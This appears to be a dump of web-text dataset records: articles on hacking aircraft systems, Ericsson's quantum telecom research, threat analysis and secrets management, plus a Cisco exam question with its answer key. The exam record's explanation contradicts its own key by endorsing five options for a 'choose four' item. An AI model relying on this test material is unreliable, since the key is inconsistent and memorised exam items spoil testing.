text
stringlengths
234
589k
id
stringlengths
47
47
dump
stringclasses
62 values
url
stringlengths
16
734
date
stringlengths
20
20
file_path
stringlengths
109
155
language
stringclasses
1 value
language_score
float64
0.65
1
token_count
int64
57
124k
score
float64
2.52
4.91
int_score
int64
3
5
Picture this: A terrorist armed not with weaponry but with their laptop. They hack into a commercial airplane's systems while hundreds of people are midair and seize control from the pilots. They steer it toward an unthinkable fate. This isn't an attack that can only exist in the lofty world of fiction. It's a potential reality in the world of aviation cybersecurity. If we don’t design our systems securely, something of this nature could happen. The critical question is: How close are we to this scenario becoming a reality? Think of an aircraft as a flying nexus of sophisticated systems–each a potential doorway for intrusions. Despite robust engineering focused on safety, no system is unbreakable. The immense complexity of a plane’s many instruments and its complex network just adds to the risk. Let’s take a look at some of the major issues: Automatic Dependent Surveillance-Broadcast (ADS-B) system The Automatic ADS-B system, crucial in modern air traffic management, is implemented in countries like the United States, Australia, and parts of Europe. Its primary vulnerability lies in the lack of encryption and authentication of ADS-B messages. This flaw could, in theory, allow for the injection of false aircraft positions or misleading information. Due to the lack of encryption, anyone can read the messages. The lack of authentication means that any message needs to be double-checked with radar to confirm a plane’s position. In-flight entertainment systems (IFEs) Unlike other more secured networks within an aircraft, IFEs are readily accessible to anyone on the plane, making them a more vulnerable target. They are within easy reach of any passenger, raising the question of whether they could be manipulated to compromise an aircraft's critical systems. Thankfully, the flight control systems are supposed to be isolated from the IFEs, so even if a hacker does manage to hack into the entertainment system, they cannot use this foothold to take over the plane. Has anyone hacked a plane? The story of cybersecurity analyst Chris Roberts has become somewhat legendary in the world of aviation cybersecurity. According to a search warrant filed by the FBI, Roberts claimed to have hacked into the in-flight entertainment system on multiple occasions between 2011 and 2014, once causing an airplane to climb and resulting in lateral movement of the plane. He reportedly did this by accessing in-flight networks through an Ethernet cable connected to a box under the passenger seat. This is a strange story, because we just told you that the flight control systems are supposed to be isolated from the IFEs. So what happened? It’s hard to tell. Roberts’ statements to Wired are different from those in the warrant application: “Roberts had previously told WIRED that he caused a plane to climb during a simulated test on a virtual environment he and a colleague created, but he insisted then that he had not interfered with the operation of a plane while in flight.” It seems likely that at least some details in the warrant application are incorrect. Numerous experts have come out and claimed that the systems are in fact isolated, and that it would be impossible for Roberts to have jumped from the IFE to the flight control systems. Another well-known incident involved researcher Ruben Santamarta, who reported vulnerabilities in the Boeing 787 Dreamliner. In a blog on his company’s website, he claimed that: In-flight entertainment systems may be an attack vector. In some scenarios such an attack would be physically impossible due to the isolation of these systems, while in others an attack remains theoretically feasible due to the physical connectivity. IOActive has successfully compromised other electronic gateway modules in non-airborne vehicles. The ability to cross the “red line” between the passenger entertainment and owned devices domain and the aircraft control domain relies heavily on the specific devices, software and configuration deployed on the target aircraft. Boeing, however, refuted the practicality of these claims, stating that their testing in both lab and real-world environments found existing defenses sufficient to prevent such scenarios. The FAA also worked with Boeing to assess these claims and was satisfied with the Boeing's assessment. It’s hard to give an independent assessment of the reality without delving deep into the network configuration. If we take Ruben Santamarta at his word that it is “theoretically feasible”, it seems likely that it’s still not a practical attack. Neither Boeing nor the FAA want planes to be downed in cyberattacks, so it seems unlikely that they would leave gaping vulnerabilities in between the IFE and the flight control systems. So, is it really possible? Considering the complexities of modern aircraft systems and the cybersecurity measures in place, the probability of successfully hacking a plane is extremely low. While vulnerabilities do exist and high-profile claims like those of Chris Roberts stir the pot, the reality is that exploiting these systems to gain control of an aircraft is incredibly difficult. The aviation industry is always working on its cybersecurity to reduce these risks. While the theoretical risks cannot be entirely dismissed, the practicality of such cyberattacks is still in doubt. Thankfully, aviation is one of the industries where we tend to err on the side of caution.
<urn:uuid:7c9757b2-d562-4023-bd0b-7d0e500e62b1>
CC-MAIN-2024-38
https://destcert.com/resources/can-you-hack-a-plane/
2024-09-10T03:07:35Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651196.36/warc/CC-MAIN-20240910025651-20240910055651-00860.warc.gz
en
0.956418
1,073
2.59375
3
Which four options describe benefits of the global load-balancing solution? (Choose four.) Click on the arrows to vote for the correct answer A. B. C. D. E. F. G.ABDF. Global load balancing (GLB) is a technique that allows incoming network traffic to be distributed across multiple data centers or server farms located around the world. This solution provides numerous benefits, including: A. Device status within the data center: With GLB, organizations can monitor the status of their devices within each data center in real-time. This allows them to quickly identify any potential issues or outages and take action to address them. B. Performance granularity: GLB provides organizations with granular control over the performance of their applications. It allows them to route traffic to the most appropriate data center or server farm based on factors such as network latency, available bandwidth, and server load. C. Centralized client access: With GLB, organizations can provide centralized access to their applications from anywhere in the world. This makes it easy for users to access the applications they need, regardless of their location. D. Intelligent traffic management: GLB provides intelligent traffic management capabilities that allow organizations to route traffic based on a variety of criteria, including network topology, user location, and application performance. E. Reacts quickly for availability only: This statement is not accurate. GLB solutions can react quickly to availability issues and take appropriate action to ensure that traffic is routed to the most appropriate data center or server farm. F. Server monitoring statistics: GLB solutions provide organizations with detailed server monitoring statistics, allowing them to identify performance bottlenecks, optimize resource utilization, and improve application performance. G. Round robin support only for load-balancing: This statement is not accurate. GLB solutions support a variety of load-balancing algorithms, including round-robin, least-connections, and IP-hash. In summary, the benefits of a global load-balancing solution include real-time device status monitoring, granular control over application performance, centralized client access, intelligent traffic management, and detailed server monitoring statistics.
<urn:uuid:edf5ea90-54aa-4ed2-b373-adc5253cd0d6>
CC-MAIN-2024-38
https://www.exam-answer.com/benefits-global-load-balancing-solution-400-251-ccie-security-exam-cisco
2024-09-10T03:43:47Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651196.36/warc/CC-MAIN-20240910025651-20240910055651-00860.warc.gz
en
0.919481
445
2.65625
3
Ericsson Research Identifies Challenges & Uses for Quantum Tech in Telecom (Ericsson.blog) Ericsson Research has identified several potential use cases for quantum technology in telecom: 1) physical layer processing of the user data plane in the RAN (quantum Fourier transform and quantum linear solver) 2) clustering for automatic anomaly detection in network design optimization project (quantum K-means algorithm) 3) prediction of the quality of user experience for video streaming based on device and network level metrics (quantum support vector machine) 4) database search at the data management layer (Grover’s algorithm) Quantum computing is just one of the many functions towards the development of a quantum network that will deliver the quantum Internet, but it still has many challenges ahead. The most significant challenges that academia and industry need to address are: –the development of error-correcting codes for error-free quantum computing –the building of architectures and interfaces between quantum computers and communication systems –the development of reliable quantum memories –the development of quantum programming languages, compilers and middle-ware stack As the technology matures and quantum-chips are available in more compact form-factors (within the next 10 years), they could be deployed closer to user premises. Thus, in this second scenario, the quantum processor would be collocated with the baseband unit but in this case, the processor would be cloud-enabled to target acceleration of virtualized RAN functions. In this scenario, the quantum accelerator is part of a distributed quantum computing system. Finally, when technology allows for miniaturization of both the chipset (see an example by Intel) and the refrigerating technologies, the quantum processor/computer could be locally deployed in the digital unit to substitute the current accelerator.
<urn:uuid:05235f9d-e1eb-4138-84f5-4ddedec3ce04>
CC-MAIN-2024-38
https://www.insidequantumtechnology.com/news-archive/ericsson-research-identifies-challenges-uses-quantum-tech-telecom/
2024-09-10T05:06:15Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651196.36/warc/CC-MAIN-20240910025651-20240910055651-00860.warc.gz
en
0.884413
369
2.625
3
Threats are everywhere in today’s world. From cyberattacks to natural disasters, organizations and individuals face a wide range of risks that can disrupt operations, cause financial loss, or harm people’s well-being. In order to effectively protect themselves, it is crucial to have a clear understanding of potential threats and develop strategies to mitigate them. This is where threat analysis comes into play. Threat analysis is a systematic process of identifying and evaluating potential threats that can impact an organization or an individual. It involves gathering information, assessing vulnerabilities, and determining the likelihood and potential impact of different threats. By conducting a thorough analysis, organizations can make informed decisions to minimize risks and enhance their security measures. Threat analysis is an essential practice in today’s interconnected and volatile world. It helps organizations and individuals identify potential risks, evaluate their impact, and develop strategies to mitigate them effectively. By understanding the various types of threats and implementing proactive measures, businesses can safeguard their assets, maintain continuity, and protect their reputation. - What Is Threat Analysis? - Importance of Threat Analysis in Today’s World - Types of Threats - Process of Threat Analysis - Benefits of Threat Analysis - Tools and Techniques for Threat Analysis - Case Studies: Real-World Examples - Best Practices for Effective Threat Analysis - Future Trends in Threat Analysis - FAQs about Threat Analysis - What do you mean by threat analysis? - What is cyber security threat analysis? - What are the 4 stages of threat analysis? - What are the steps of threat analysis? - What is the importance of threat analysis in cybersecurity? - How does threat analysis differ from risk analysis? - What are the key sources of information for threat analysis? - How often should threat analysis be conducted? - What are some common challenges in conducting threat analysis? - How does threat analysis support decision-making? What Is Threat Analysis? Threat analysis, also known as risk analysis or threat assessment, is a systematic process of identifying and evaluating potential threats or risks to a system, organization, or individual. It involves the examination of various factors, vulnerabilities, and potential consequences in order to understand and prioritize threats. The purpose of threat analysis is to gain insight into the potential harm that can be caused by threats and to develop strategies to mitigate or manage those risks effectively. By understanding the threats, their likelihood of occurrence, and their potential impact, organizations can make informed decisions and take appropriate actions to reduce their exposure to risks. Threat analysis typically involves the following steps: - Identification of assets: Determine the assets, systems, or processes that need protection or analysis. - Threat identification: Identify and categorize potential threats that could pose risks to the identified assets. This can include natural disasters, cyberattacks, human errors, technological failures, or other potential hazards. - Vulnerability assessment: Evaluate the vulnerabilities or weaknesses in the assets or systems that could be exploited by the identified threats. - Risk assessment: Assess the likelihood and potential impact of each threat. This involves considering factors such as the probability of the threat occurring, the magnitude of its impact, and the effectiveness of existing controls or safeguards. - Risk prioritization: Prioritize the identified risks based on their level of severity, allowing organizations to focus their resources on addressing the most significant threats. - Risk mitigation: Develop and implement strategies to mitigate or manage the identified risks. This can include implementing security controls, developing contingency plans, conducting training and awareness programs, or adopting insurance coverage, among other measures. - Monitoring and review: Continuously monitor the threat landscape, reassess risks periodically, and update the threat analysis process as necessary to ensure it remains relevant and effective. Threat analysis is commonly employed in various domains, such as cybersecurity, physical security, emergency management, and business continuity planning, to proactively identify and address potential risks to protect assets and ensure operational resilience. Importance of Threat Analysis in Today’s World Threat analysis is of paramount importance in today’s world due to the increasing complexity and evolving nature of threats that individuals, organizations, and societies face. Here are several reasons why threat analysis is crucial: - Proactive risk management: Threat analysis allows for proactive identification and assessment of potential risks before they materialize. By understanding and analyzing threats in advance, organizations can take preventive measures to mitigate or minimize their impact. - Protection of assets and resources: Threat analysis helps identify vulnerabilities in critical assets and resources, such as information systems, infrastructure, intellectual property, and personnel. By recognizing potential threats and their associated risks, organizations can implement appropriate security measures to safeguard these valuable assets. - Enhanced cybersecurity: In the digital age, cyber threats are pervasive and constantly evolving. Threat analysis plays a crucial role in understanding the latest cyber threats, vulnerabilities, and attack techniques. It enables organizations to strengthen their cybersecurity posture by implementing effective defenses, conducting vulnerability assessments, and developing incident response plans. - Business continuity and resilience: Threat analysis assists in identifying potential disruptions that could impact business operations, such as natural disasters, supply chain disruptions, or technological failures. By conducting comprehensive threat analysis, organizations can develop robust business continuity plans, implement risk mitigation strategies, and ensure resilience in the face of adverse events. - Decision-making and resource allocation: Threat analysis provides critical information for informed decision-making and resource allocation. By understanding the likelihood and potential impact of various threats, organizations can prioritize their efforts, allocate resources effectively, and make informed decisions about risk tolerance and investments in risk mitigation. - Compliance and regulatory requirements: Many industries have specific compliance and regulatory requirements related to risk management and security. Threat analysis assists organizations in meeting these obligations by identifying potential threats, assessing risks, and implementing necessary controls to comply with legal and industry standards. - Public safety and national security: Threat analysis plays a crucial role in safeguarding public safety and national security. It helps identify potential threats to society, such as terrorism, cyberattacks, or natural disasters, allowing governments and security agencies to develop strategies to prevent, detect, and respond to these threats effectively. Threat analysis provides a structured and systematic approach to understanding and mitigating risks. By adopting a proactive mindset and integrating threat analysis into their operations, individuals and organizations can better protect their assets, ensure continuity, and respond effectively to the evolving threat landscape in today’s complex world. Types of Threats Cyber threats refer to risks targeting computer systems, networks, and data. They include various malicious activities conducted by hackers, cybercriminals, and other threat actors. Examples of cyber threats include malware attacks, phishing scams, ransomware, data breaches, denial-of-service (DoS) attacks, and identity theft. Physical threats encompass risks to tangible assets, infrastructure, and individuals. These threats can include theft, vandalism, unauthorized access, natural disasters (such as earthquakes, floods, or hurricanes), fire, accidents, and acts of violence or terrorism. Physical security measures, such as surveillance systems, access controls, and emergency response plans, are implemented to mitigate these risks. Financial threats involve risks to an individual’s or organization’s financial well-being. This can include fraud, embezzlement, theft of funds, investment scams, unauthorized transactions, economic downturns, or market volatility. Effective financial management, internal controls, and fraud detection mechanisms are essential to mitigate financial threats. Environmental threats refer to risks associated with the natural environment and ecological factors. These threats include climate change, pollution, resource depletion, natural disasters (such as hurricanes, floods, wildfires), and environmental accidents (such as oil spills or chemical leaks). Mitigation strategies for environmental threats may involve sustainable practices, disaster preparedness, and conservation efforts. Social threats involve risks related to human interactions, societal issues, and reputation. They can include public relations crises, negative public perception, social engineering attacks, defamation, discrimination, bullying, and social unrest. Organizations often employ communication strategies, stakeholder engagement, and social responsibility initiatives to manage social threats effectively. It’s important to note that these threat categories are not mutually exclusive, and threats can often overlap or intersect. For example, a cyber threat can have physical or financial implications, and environmental disasters can result in both physical and financial risks. By understanding and recognizing the different types of threats, individuals and organizations can develop comprehensive risk management strategies and implement appropriate measures to mitigate or respond to these risks effectively. Process of Threat Analysis The first step in threat analysis is to gather relevant information about the system, organization, or context under analysis. This includes identifying critical assets, understanding the operational environment, reviewing existing security controls, and collecting data on previous incidents or threats. Identifying Potential Threats In this step, potential threats are identified based on the gathered information. This can involve brainstorming sessions, expert knowledge, historical data analysis, or threat intelligence sources. The goal is to identify the various threats that could potentially harm the assets or disrupt operations. Assessing the Impact of Threats Once potential threats are identified, the next step is to assess their potential impact on the organization or system. This includes analyzing the consequences that could arise if a threat materializes, such as financial losses, operational disruptions, reputational damage, legal or regulatory penalties, or harm to individuals’ safety. Vulnerabilities are weaknesses or gaps in the system or organization that could be exploited by threats. In this step, vulnerabilities are identified and assessed to understand the likelihood of threats successfully exploiting them. This evaluation can include technical assessments, security audits, penetration testing, or vulnerability scanning. Developing Mitigation Strategies After understanding the potential threats and vulnerabilities, mitigation strategies are developed to reduce or eliminate the risks. These strategies may involve a combination of preventive, detective, and corrective measures. Examples include implementing security controls, enhancing physical security, conducting employee training, creating incident response plans, or adopting business continuity measures. It’s important to note that threat analysis is an iterative process. As new information becomes available or the threat landscape evolves, the analysis should be reviewed and updated regularly to ensure its effectiveness. By following a structured threat analysis process, organizations can gain a deeper understanding of the risks they face, prioritize their efforts and resources, and develop effective strategies to mitigate and manage those risks proactively. Benefits of Threat Analysis - Risk Reduction: Threat analysis helps in identifying potential risks and vulnerabilities, allowing organizations to implement preventive measures and controls. By understanding the threats they face, organizations can reduce the likelihood and impact of adverse events, minimizing potential losses and disruptions. - Proactive Decision Making: Threat analysis enables proactive decision making by providing valuable insights into the risks and potential consequences associated with different courses of action. This empowers decision-makers to make informed choices, develop risk mitigation strategies, and allocate resources effectively to address the identified threats. - Resource Optimization: Threat analysis helps in optimizing resource allocation by focusing efforts and resources on the most critical threats. By identifying and prioritizing risks, organizations can allocate their budget, manpower, and technological resources more efficiently, ensuring that resources are directed to areas where they are most needed. - Enhancing Security Measures: Threat analysis allows organizations to identify gaps and weaknesses in their security measures. It provides a framework to assess and improve existing security controls, policies, and procedures to address the identified threats effectively. This leads to an enhanced security posture and a stronger defense against potential attacks or incidents. - Business Continuity Planning: Threat analysis is instrumental in business continuity planning. By identifying potential threats and their potential impacts on critical operations, organizations can develop comprehensive contingency plans. These plans enable organizations to respond effectively to disruptions, recover operations efficiently, and minimize the negative consequences of incidents. Threat analysis offers numerous benefits, including reducing risks, making proactive decisions, optimizing resource allocation, enhancing security measures, and facilitating business continuity planning. By investing in threat analysis, individuals and organizations can enhance their preparedness and resilience in the face of potential threats and ensure the long-term sustainability of their operations. Tools and Techniques for Threat Analysis SWOT (Strengths, Weaknesses, Opportunities, Threats) analysis is a framework used to assess the internal strengths and weaknesses of an organization (or individual) and external opportunities and threats in its environment. It helps identify potential threats by analyzing factors such as competition, market trends, technological advancements, and regulatory changes. PESTEL (Political, Economic, Sociocultural, Technological, Environmental, Legal) analysis is a tool used to examine the external macro-environmental factors that can impact an organization or system. It helps identify threats arising from changes in government regulations, economic conditions, social trends, technological advancements, environmental concerns, or legal factors. Vulnerability scanning tools are used to identify vulnerabilities and weaknesses in computer systems, networks, and applications. These tools automatically scan for known vulnerabilities and misconfigurations, providing insights into potential entry points for cyber threats. By identifying vulnerabilities, organizations can take appropriate measures to address them and reduce the risk of exploitation. Risk Assessment Software Risk assessment software provides a systematic approach to identifying, assessing, and managing risks. These tools often include features such as risk identification templates, risk analysis algorithms, risk rating scales, and reporting capabilities. They help streamline the threat analysis process, facilitate risk prioritization, and support decision-making for risk mitigation strategies. Threat Intelligence Platforms Threat intelligence platforms aggregate, analyze, and disseminate information about emerging threats, vulnerabilities, and attack techniques. These platforms collect data from various sources, such as security blogs, forums, incident reports, and security researchers, and provide real-time threat intelligence to organizations. Threat intelligence platforms help organizations stay informed about the latest threats and take proactive measures to mitigate them. Data Analytics and Machine Learning Data analytics and machine learning techniques can be utilized to analyze large volumes of data and identify patterns or anomalies that may indicate potential threats. These techniques can help detect suspicious activities, identify emerging threats, and enable proactive threat mitigation. It’s important to note that these tools and techniques are not exhaustive, and the choice of tools may vary depending on the specific requirements and context of the threat analysis. Organizations often use a combination of these tools and techniques to gain comprehensive insights into potential threats and develop effective risk management strategies. Case Studies: Real-World Examples Threat Analysis in the Banking Sector In the banking sector, threat analysis plays a crucial role in identifying and mitigating risks to protect financial institutions and their customers. One notable example is the analysis of fraud threats in online banking. Banks employ threat analysis techniques to identify potential vulnerabilities in their online banking systems, such as weaknesses in authentication mechanisms or vulnerabilities in transaction processing. By conducting threat analysis, banks can anticipate and address various fraud threats, including phishing attacks, account takeovers, malware-based attacks, or social engineering attempts. For instance, a bank may conduct threat analysis by monitoring emerging fraud trends, studying attack techniques used by fraudsters, and analyzing historical fraud incidents. Based on the analysis, the bank can identify potential threats and their impact on customer accounts and financial systems. The analysis helps in developing preventive measures such as enhanced customer authentication methods, transaction monitoring systems, and employee training programs. This proactive approach helps banks mitigate risks, protect customer assets, and maintain trust in the banking system. Threat Analysis in Cybersecurity Threat analysis is a fundamental component of cybersecurity, where it aids in identifying and understanding potential cyber threats to protect organizations’ digital assets. A notable example is the analysis of ransomware threats. Ransomware attacks have become increasingly prevalent, targeting various industries and organizations worldwide. Threat analysis enables cybersecurity professionals to study the behavior of ransomware strains, identify vulnerabilities that attackers exploit, and understand their propagation mechanisms. For instance, a threat analysis of ransomware might involve analyzing malware samples, studying infection vectors (such as malicious emails or compromised websites), and assessing the impact of ransomware on different systems and data. B y conducting threat analysis, organizations can enhance their defensive strategies by implementing measures like robust backup and recovery systems, network segmentation, endpoint protection solutions, and user awareness training. Additionally, threat analysis helps in staying up to date with the evolving tactics used by ransomware operators and adapting defensive measures accordingly. These case studies illustrate how threat analysis is applied in specific sectors like banking and cybersecurity to proactively identify risks, develop effective mitigation strategies, and protect critical assets and operations. Best Practices for Effective Threat Analysis Regular Updates and Assessments Threat landscapes are constantly evolving, with new threats emerging and existing ones evolving. It is crucial to regularly update and reassess the threat analysis process to stay current. This involves reviewing and incorporating the latest threat intelligence, monitoring industry trends, and conducting periodic assessments to identify any new threats or changes in the risk landscape. Collaboration and Information Sharing Threat analysis should involve collaboration and information sharing among relevant stakeholders, both within the organization and with external partners. Sharing information about emerging threats, vulnerabilities, and mitigation strategies can help create a collective defense approach. Collaboration fosters a broader perspective and enables organizations to benefit from the expertise and insights of others in the industry or security community. Training and Education Building a strong security culture is vital for effective threat analysis. Providing regular training and education to employees and stakeholders helps raise awareness about potential threats, teaches best practices for risk mitigation, and encourages a proactive mindset towards security. Training programs should cover topics such as recognizing phishing attempts, practicing good password hygiene, and adhering to security policies and procedures. Threat analysis should be an ongoing and continuous process. Regularly monitoring systems, networks, and assets allows for timely detection of potential threats and vulnerabilities. Continuous monitoring enables organizations to identify suspicious activities, anomalous behavior, or indicators of compromise, allowing for quick response and mitigation actions. Integration with Incident Response Threat analysis should be closely integrated with incident response processes. Incident response plans should be developed and tested in conjunction with threat analysis activities. This ensures a coordinated and efficient response in the event of a security incident or breach. Lessons learned from incidents should also be fed back into the threat analysis process to continuously improve security posture. Documentation and Documentation Review Thorough documentation of threat analysis processes, findings, and mitigation strategies is crucial. It helps in maintaining a record of identified threats, vulnerabilities, and implemented controls. Regular review and update of documentation ensure that threat analysis activities remain up to date and aligned with organizational objectives. By following these best practices, organizations can enhance the effectiveness of their threat analysis efforts, proactively identify and address potential risks, and better protect their assets and operations from emerging threats. Future Trends in Threat Analysis As technology continues to advance, several future trends are expected to shape the field of threat analysis. Here are three significant trends: Artificial Intelligence and Machine Learning Artificial intelligence (AI) and machine learning (ML) are poised to play a crucial role in threat analysis. These technologies can analyze vast amounts of data, identify patterns, and detect anomalies that might indicate potential threats. AI and ML can enhance the speed and accuracy of threat detection, enable proactive threat hunting, and improve incident response by automating certain tasks. Additionally, AI-powered threat intelligence platforms can provide real-time insights and predictive analytics, helping organizations stay ahead of evolving threats. IoT and Connected Devices The proliferation of Internet of Things (IoT) devices and the increasing connectivity of various systems and devices introduce new dimensions of threat analysis. IoT devices often have limited security controls and can be vulnerable to exploitation. Threat analysis will need to evolve to include the assessment of risks associated with interconnected devices, such as unauthorized access, data breaches, and attacks on critical infrastructure. The analysis will focus on understanding the potential impact of compromised IoT devices on overall system security and the associated risks to individuals and organizations. Advanced Data Analytics Advanced data analytics techniques, including big data analytics, predictive analytics, and behavioral analytics, will play a significant role in threat analysis. These techniques can process and analyze large volumes of data from diverse sources, enabling the identification of subtle patterns and indicators of potential threats. Advanced data analytics can help in identifying emerging threats, improving threat detection accuracy, and supporting decision-making processes. It can also enable organizations to leverage threat intelligence from multiple sources, including internal logs, external threat feeds, and dark web monitoring. These future trends in threat analysis will require organizations to invest in advanced technologies, develop new skill sets within their security teams, and adapt their processes and methodologies. Embracing these trends will help organizations stay ahead of rapidly evolving threats, enhance their security posture, and effectively protect their assets and operations in the face of emerging risks. FAQs about Threat Analysis What do you mean by threat analysis? Threat analysis is the process of identifying and assessing potential threats that could harm an organization, system, or individual. It involves analyzing the likelihood and impact of various threats and vulnerabilities, understanding the potential consequences, and developing strategies to mitigate or manage those risks. What is cyber security threat analysis? Cybersecurity threat analysis specifically focuses on identifying and evaluating threats in the digital realm. It involves analyzing potential cyber threats, such as malware, phishing attacks, data breaches, or network intrusions. Cybersecurity threat analysis aims to understand the tactics, techniques, and motivations of threat actors and develop effective strategies to detect, prevent, and respond to cyber threats. What are the 4 stages of threat analysis? The four stages of threat analysis typically include: a) Gathering Information: Collecting relevant data about the system, organization, or context under analysis. b) Identifying Potential Threats: Identifying the various threats that could potentially harm the assets or disrupt operations. c) Assessing the Impact of Threats: Evaluating the potential consequences and impact of identified threats. d) Evaluating Vulnerabilities: Identifying weaknesses or vulnerabilities that could be exploited by threats. What are the steps of threat analysis? The steps of threat analysis generally include: a) Gathering Information: Collecting relevant data, such as asset inventory, system architecture, historical data, and threat intelligence. b) Identifying Potential Threats: Brainstorming, using expert knowledge, or leveraging threat intelligence sources to identify potential threats. c) Assessing the Impact of Threats: Analyzing the potential consequences and impact of identified threats on the organization or system. d) Evaluating Vulnerabilities: Identifying vulnerabilities or weaknesses in the system that could be exploited by threats. e) Developing Mitigation Strategies: Creating strategies to reduce or eliminate risks by implementing security controls, policies, and procedures. What is the importance of threat analysis in cybersecurity? Threat analysis is vital in cybersecurity as it helps organizations proactively identify and assess potential cyber threats. It enables them to understand the evolving threat landscape, anticipate potential risks, and implement appropriate security measures. Threat analysis enhances incident response capabilities, minimizes the impact of cyber attacks, and protects sensitive data and systems from unauthorized access, data breaches, and other cyber threats. How does threat analysis differ from risk analysis? Threat analysis focuses on identifying and evaluating potential threats, such as malicious actors or harmful events, that can exploit vulnerabilities. Risk analysis, on the other hand, involves assessing the likelihood and impact of those threats combined with the vulnerabilities present in a system or organization. While threat analysis focuses on understanding the potential sources of harm, risk analysis takes into account the probability and potential consequences of those threats, enabling organizations to prioritize and manage risks effectively. What are the key sources of information for threat analysis? Key sources of information for threat analysis include internal sources, such as incident logs, security event data, and system logs. External sources, such as threat intelligence feeds, security forums, industry reports, and government advisories, also provide valuable insights into emerging threats and attack techniques. Collaboration and information sharing with other organizations, industry peers, and security communities can further enrich the information available for threat analysis. How often should threat analysis be conducted? Threat analysis should be conducted on a regular basis to account for the evolving threat landscape. The frequency depends on factors such as the industry, organizational context, and the rate of change in the threat landscape. Conducting threat analysis annually or semi-annually is a common practice, but organizations in high-risk sectors or those experiencing rapid changes may need more frequent assessments. Regular updates and assessments ensure that organizations stay proactive and responsive to emerging threats. What are some common challenges in conducting threat analysis? Common challenges in conducting threat analysis include the rapidly evolving threat landscape, the complexity of systems and networks, limited visibility into emerging threats, and the availability of skilled personnel. Gathering accurate and timely threat intelligence, keeping up with emerging attack techniques, and allocating sufficient resources for analysis can also pose challenges. It is crucial for organizations to stay updated, leverage automation and technology, and invest in the training and development of skilled security professionals to address these challenges effectively. How does threat analysis support decision-making? Threat analysis supports decision-making by providing valuable insights into potential risks and their potential impact. Decision-makers can use threat analysis to understand the likelihood and consequences of different threats and vulnerabilities, prioritize resources and investments, and make informed decisions about security controls, incident response plans, and risk mitigation strategies. By incorporating threat analysis into the decision-making process, organizations can align their security efforts with business objectives and allocate resources effectively to address the identified threats. These FAQs provide further clarity on important aspects of threat analysis, its relationship with risk analysis, sources of information, frequency of assessments, common challenges, and its role in decision-making. In conclusion, threat analysis is a crucial process for organizations to proactively identify, assess, and mitigate potential risks and threats. Throughout this discussion, we have covered various aspects of threat analysis, including its definition, stages, steps, and importance in different domains such as cybersecurity and the banking sector. Recapping the key points, threat analysis involves gathering information, identifying potential threats, assessing their impact, evaluating vulnerabilities, and developing effective mitigation strategies. It helps organizations reduce risks, make proactive decisions, optimize resources, enhance security measures, and plan for business continuity. We have also explored the benefits of threat analysis, including risk reduction, proactive decision-making, resource optimization, enhancing security measures, and facilitating business continuity planning. By following best practices such as regular updates and assessments, collaboration and information sharing, training and education, and continuous monitoring, organizations can ensure the effectiveness of their threat analysis efforts. Looking ahead, future trends in threat analysis include the integration of artificial intelligence and machine learning, the impact of IoT and connected devices, and the use of advanced data analytics. Organizations should embrace these trends to stay ahead of evolving threats and protect their assets and operations effectively. Threat analysis is an ongoing and critical process that empowers organizations to identify and address potential risks in a proactive and systematic manner. By implementing robust threat analysis practices, organizations can enhance their security posture, minimize the impact of threats, and safeguard their valuable resources and stakeholders. It is recommended that organizations prioritize threat analysis as an integral part of their overall risk management strategy to stay resilient in the face of emerging threats. Information Security Asia is the go-to website for the latest cybersecurity and tech news in various sectors. Our expert writers provide insights and analysis that you can trust, so you can stay ahead of the curve and protect your business. Whether you are a small business, an enterprise or even a government agency, we have the latest updates and advice for all aspects of cybersecurity.
<urn:uuid:159f0674-8b1a-446e-96ad-cc79337f2a9c>
CC-MAIN-2024-38
https://informationsecurityasia.com/what-is-threat-analysis/
2024-09-13T21:43:59Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.48/warc/CC-MAIN-20240913201909-20240913231909-00560.warc.gz
en
0.927642
5,652
2.890625
3
1 Introduction / Executive Summary The term ‘secrets’ has recently been seconded into the IT lexicon. It is being used as a collective noun for passwords, keys, certificates, and tokens that must not be disclosed i.e., they must be ‘kept secret’. Account take-overs remain the most common mechanism for unauthorized intrusion to protected systems, resulting in cybersecurity compromise. This vulnerability is increased by issues such as poor password management, service account credentials hardcoded in config files, and database passwords kept in shared folders. The problem is exacerbated for cloud development environments where account credentials are held in S3 buckets, Azure DevOps, CI/CD tools and various source-code repositories. In multi-cloud environments the beleaguered CIO has no option but to employ ‘secrets management’ technology to help mitigate the risk of account compromise. Secrets Management is a wide field. In this Leadership Compass the term refers to credentials that are used by people, systems or devices seeking access to a protected resource such as an application, database, software module or device; the authentication credential may be a password, a token, or a key. Passwords are a perennial problem and are slowly being replaced by other authentication mechanisms, but while they are still widely used, a mechanism is needed to securely manage them. While passwords are secrets that must be managed their usage is diminishing so this document focuses on token and key management solutions. Software tokens can be a passphrase stored on a system that is substituted for a password when a complex password, one that a human cannot remember, is required. One-time-passwords are also tokens. These are machine-generated and used in conjunction with an authentication server to validate a possession factor such as an OTP device or smartphone. API tokens are increasingly used to transmit user data to an application. Examples are authentication tokens such as an HTTP file containing a header, payload with identity attributes and trailer, or JSON Web Tokens that can also pass identity data in a JSON array to a relying application for authorization purposes. Keys include basic API keys used to identify code components, TLS keys for session protection, signing keys used to validate source identities and encryption keys used to protect documents and files. PKI private keys that are used for signing and/or encryption, must be protected. While PKI certificates are not ‘secrets’ a mechanism is required to ensure validity and currency of a certificate. Secrets management requires a secure storage facility with the capability for approved persons to manage access rights to the stored secrets. The solution will release secrets as required, and as appropriate, for access to applications and supported platforms. It should also provide secrets management functions such as identifying expiring secrets and removal of secrets no longer required. While legacy operations will continue to use passwords for some time, new deployments should embrace access control solutions that leverage the benefits of secrets management. Vendors featured in this document cover secret storage vaults, credential lifecycle managers and key management tools, as well as DevOps tools for cloud deployment. Organizations seeking to protect their sensitive resources such as a computer application or corporate documentation should analyze their current requirements and understand the industry direction before committing to a specific solution. Passwords provide a simple authentication mechanism that is well understood by users and represent a low-friction option for access control. Increasingly stronger authentication mechanisms such as multi-factor authentication are being adopted to improve cybersecurity. A software ‘token’, typically stored on an end-point system or a removable device, can provide more complex or longer passwords or passphrases for increased protection. If used in conjunction with a PIN or biometric it can enable multi-factor authentication. Recent developments in this sector include private access tokens for secure access to web services. Certificates, typically used in asynchronous key models, provide security for a wide range of applications from account access to sensitive document protection. Secrets management supports popular access control mechanisms including the OpenID Connect (OIDC) federation and the Fast Identity Online (FIDO) Alliance. The release of the FIDO2 specifications significantly improve the ease with which password-less authentication can be realized.
